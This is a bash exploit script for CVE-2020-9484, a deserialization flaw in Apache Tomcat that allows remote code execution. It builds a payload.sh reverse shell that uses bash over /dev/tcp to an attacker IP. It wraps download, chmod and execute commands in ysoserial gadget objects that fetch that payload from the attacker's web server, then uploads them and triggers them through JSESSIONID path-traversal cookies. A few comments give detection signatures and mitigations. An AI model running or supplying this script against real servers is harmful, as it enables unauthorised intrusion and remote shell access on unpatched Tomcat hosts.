#!/bin/bash
# Exploit Title: Apache Tomcat RCE by deserialization
# Exploit Author: Pentestical (@ptestical)
# Date: 31.12.2020
# CVE-ID: CVE-2020-9484
# Version: Apache Tomcat 9.0.27
# Tested on: Kali Linux 2020.4
# Remote Code Execution by Deserialization
# Address and port of the listener that receives the reverse shell; edit
# remote_ip before running, the port only if you need a different one.
remote_ip=10.10.15.108 # change this
port=4444
# Target: host from the first CLI argument, Tomcat's default HTTP port.
target_ip=$1
target_port=8080 # default port
# Print the ASCII-art banner to stdout. Every line is a single-quoted
# literal, so nothing inside the art is expanded (same as the quoted heredoc).
banner() {
  printf '%s\n' \
    '____ ____________ __' \
    '/ __ \/ ____/ ____/________ _/ /_' \
    '/ /_/ / / / __/ / ___/ __ `/ __/' \
    '/ _, _/ /___/ /___/ /__/ /_/ / /_' \
    '/_/ |||\____/_____/||||/\__,_/\__/ __ __ _ __' \
    '/ /_ __ __ / __ \___ ____ / /____ _____/ /_(_)________ _/ /' \
    '/ __ \/ / / / / /_/ / _ \/ __ \/ __/ _ \/ ___/ __/ / ___/ __ `/ /' \
    '/ /_/ / /_/ / / ____/ __/ / / / /_/ __(__ ) /_/ / /__/ /_/ / /' \
    '/_.___/\__, / /_/ \___/_/ /_/\__/\___/____/\__/_/\___/\__,_/_/' \
    '/____/'
}
# Usage / help: when no target is given (or -h / --help is requested) print
# the instructions and stop before anything else runs.
case "$1" in
  ""|--help|-h)
    printf '\n'
    printf '%s\n' "$(tput setaf 3;tput bold)usage: ./CVE-2020-9484.sh target-ip"
    printf '\n'
    printf '%s\n' "$(tput setaf 4;tput bold)Please start a web listener in /tmp folder:"
    printf '%s\n' "$(tput setaf 3;tput bold)python3 -m http.server 80"
    printf '\n'
    printf '%s\n' "$(tput setaf 4;tput bold)and start your netcat listener at port 4444:"
    printf '%s\n' "$(tput setaf 3;tput bold)nc -nvlp 4444"
    exit
    ;;
esac
# Reached only when a target argument was supplied: show the banner first.
banner
#######################################
# Locate ysoserial-master.jar anywhere on the local filesystem (see
# install.txt for how to install it) and store its path in the global
# ysoserial_file. Exits the whole script when nothing is found.
# Globals:   ysoserial_file (written)
# Arguments: none
# Outputs:   colored status messages on stdout
# Returns:   0 when the jar was found; does not return otherwise
# Note: scanning / with find can take a long time on large disks.
#######################################
find_ysoserial_on_system() {
  echo "$(tput setaf 6;tput bold)[+] Checking if you have installed ysoserial.."
  sleep 1
  ysoserial_file=$(find / -name "ysoserial-master.jar" -type f 2>/dev/null)
  if [[ -n "$ysoserial_file" ]]; then
    echo "$(tput setaf 5;tput bold)[+] Found ysoserial-master.jar!"
    return
  fi
  echo "$(tput setaf 1;tput bold)You need ysoserial-master.jar in order to use this script!"
  echo "$(tput setaf 1;tput bold)Please make sure to follow the install.txt guide!"
  echo "$(tput setaf 1;tput bold)Quitting.."
  exit
}
# creating payload files using ysoserial
#######################################
# Build the stage files that get_reverse_shell later sends to the target.
# Everything is written to the current directory:
#   payload.sh              - bash script that opens an interactive shell to
#                             remote_ip:port over /dev/tcp
#   downloadPayload.session - ysoserial CommonsCollections2 object carrying a
#                             curl command that saves payload.sh to /tmp
#   chmodPayload.session    - same gadget, command: chmod 777 /tmp/payload.sh
#   executePayload.session  - same gadget, command: bash /tmp/payload.sh
# Globals:   remote_ip, port, ysoserial_file (read)
# Arguments: none
# Outputs:   colored progress messages on stdout; the four files above
# Returns:   status of the final sleep; java failures are not checked
# Defender note: each stage is visible on the victim as a process event —
# a curl launched by the Tomcat user, a chmod on /tmp/payload.sh, then a
# bash child connecting out to remote_ip:port.
#######################################
create_payload_files(){
echo "$(tput setaf 6;tput bold)[+] Trying to create payload files.."
sleep 1
echo "$(tput setaf 6;tput bold)[+] Creating payload.sh file.."
# remove any previous copy first, because the two echo lines below append
rm -rf payload.sh
echo "#!/usr/bin/bash" >> payload.sh
echo "bash -c 'bash -i >& /dev/tcp/$remote_ip/$port 0>&1'" >> payload.sh
sleep 1
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo "$(tput setaf 6;tput bold)[+] Trying to create first ysoserial payload file"
sleep 1
# ysoserial_file was set by find_ysoserial_on_system; each java call writes
# one serialized object to stdout, redirected into a .session file
java -jar $ysoserial_file CommonsCollections2 'curl http://$remote_ip/payload.sh -o /tmp/payload.sh' > downloadPayload.session
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo "$(tput setaf 6;tput bold)[+] Trying to create second ysoserial payload file"
sleep 1
java -jar $ysoserial_file CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo "$(tput setaf 6;tput bold)[+] Trying to create last ysoserial payload file"
sleep 1
java -jar $ysoserial_file CommonsCollections2 'bash /tmp/payload.sh' > executePayload.session
echo "$(tput setaf 5;tput bold)[+] Finished!"
sleep 1
echo "$(tput setaf 2;tput bold)----------------------------------------------------------------"
echo "$(tput setaf 4;tput bold)[+] Succesfully created all files!"
echo "$(tput setaf 2;tput bold)----------------------------------------------------------------"
sleep 1
}
# get a reverse shell
#######################################
# Send the three stages to the target in order. For every stage the
# serialized object is POSTed to upload.jsp and then a second request
# presents a JSESSIONID cookie holding a ../ traversal to
# /opt/samples/uploads/<stage>; per the CVE-2020-9484 advisory a Tomcat
# instance using a file-backed PersistenceManager loads that file as a
# session and deserializes it.
# Globals:   target_ip, target_port (read)
# Arguments: none
# Outputs:   curl output and status messages on stdout
# Returns:   status of the final echo; curl results are not checked
# Defender note: a cookie value of the form JSESSIONID=../../../... is a
# high-fidelity access-log signature; upload.jsp and /opt/samples/uploads
# are specific to the environment this script was written against.
# Mitigation: a Tomcat release that fixes CVE-2020-9484, or no file-backed
# session store without a restrictive sessionAttributeValueClassNameFilter.
#######################################
get_reverse_shell(){
echo "[+] Trying to get a reverse shell.."
echo "[+] Make sure to have netcat and python weblistener in current folder running.."
# stage 1: upload the download object, then trigger it via the traversal cookie
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload' -F '[email protected]'
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload'
sleep 1
# stage 2: same pattern for the chmod object
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload' -F '[email protected]'
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload'
sleep 1
# stage 3: same pattern for the execute object
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/executePayload' -F '[email protected]'
curl http://$target_ip:$target_port/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/executePayload'
echo ""
echo "$(tput setaf 5;tput bold)[+] Finished!"
echo ""
echo "$(tput setaf 4;tput bold)[+] If you don't have a reverse shell, try to run it again!"
}
# Run the steps in order: locate ysoserial, build the stage files, then drive
# the target. Each is a function defined above; the later steps rely on the
# globals and files produced by the earlier ones, and the first two exit the
# script themselves when a prerequisite is missing.
for step in find_ysoserial_on_system create_payload_files get_reverse_shell; do
  "$step"
done